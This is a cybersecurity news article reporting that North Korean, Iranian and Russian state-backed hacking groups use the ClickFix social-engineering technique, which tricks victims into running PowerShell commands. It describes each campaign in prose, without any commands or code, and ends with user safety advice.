A growing number of state-backed hacking groups from North Korea, Iran, and Russia are leveraging a deceptive cyberattack method known as ClickFix, which is rapidly gaining popularity among advanced persistent threat (APT) actors due to its high success rate and low technical visibility.
ClickFix operates as a social engineering scheme, where attackers lure victims to malicious websites mimicking legitimate software portals or document-sharing platforms. Once on the site, users are confronted with fake error messages claiming a document or software download has failed. To “fix” the issue, victims are prompted to manually run a PowerShell or command-line script, unknowingly launching malware on their system.
Global Adoption by State-Sponsored Threat Actors
Cybersecurity firm Proofpoint recently released a report documenting widespread adoption of ClickFix between late 2024 and early 2025, naming APT groups like Kimsuky (North Korea), MuddyWater (Iran), APT28, and a Russian-linked actor dubbed UNK_RemoteRogue as users of the tactic in espionage campaigns.
-
North Korea’s Kimsuky: Targeted think tanks involved in Korean policy using emails that impersonated Japanese diplomats. The phishing messages linked to fake secure drives that prompted targets to register devices via PowerShell commands, ultimately installing QuasarRAT while displaying decoy documents to avoid suspicion.
ALSO READ: Call for Cyber Experts: Join FCRF Academy as Trainers and Course Creators
-
Iran’s MuddyWater: Masqueraded as Microsoft in mid-November 2024, sending phishing emails to 39 organizations across the Middle East. Victims were tricked into executing a PowerShell script under the guise of applying a critical security patch, which instead installed ‘Level’, a remote monitoring tool used for surveillance and data theft.
-
Russia’s UNK_RemoteRogue: Targeted firms linked to an arms manufacturer in December 2024. Emails from compromised Zimbra servers directed victims to fake Microsoft Word pages with instructions and even a YouTube tutorial, leading to PowerShell execution tied to the Empire C2 framework.
-
APT28 (Fancy Bear): Another Russian threat actor, linked to the GRU, used ClickFix in October 2024 to distribute phishing emails that mimicked Google Spreadsheets and prompted users through a reCAPTCHA spoof. Once the user ran the script, it established an SSH tunnel and deployed Metasploit, granting attackers backdoor access to the device.
Why ClickFix Works
Unlike traditional phishing that depends on malicious file attachments, ClickFix relies on user-initiated command execution. This bypasses many automated security filters because the commands are input manually by the victim, often believing they are resolving a technical issue.
ALSO READ: “DFIR Capability Maturity Assessment Framework” by ALGORITHA
Experts warn that the success of ClickFix is driven by a lack of user awareness regarding the risks of executing unfamiliar scripts, especially with administrator privileges.
Microsoft and Cybersecurity Experts Respond
Microsoft’s Threat Intelligence team previously flagged the rise of ClickFix in campaigns run by Kimsuky and highlighted the need for global awareness. Proofpoint’s latest analysis further confirms that ClickFix is becoming a go-to method for modern cyber espionage, especially among actors aligned with hostile state agendas.
How to Stay Safe
Security professionals advise users to:
-
Never run commands from emails or websites unless verified.
-
Avoid copying scripts into command prompts or PowerShell from unknown sources.
-
Check email sources, domain names, and grammar for signs of impersonation.
-
Report suspicious messages to IT or cybersecurity teams.
As state-backed cyber campaigns evolve, ClickFix stands out as a potent reminder of how human error remains one of the most exploited vulnerabilities in today’s digital threat landscape.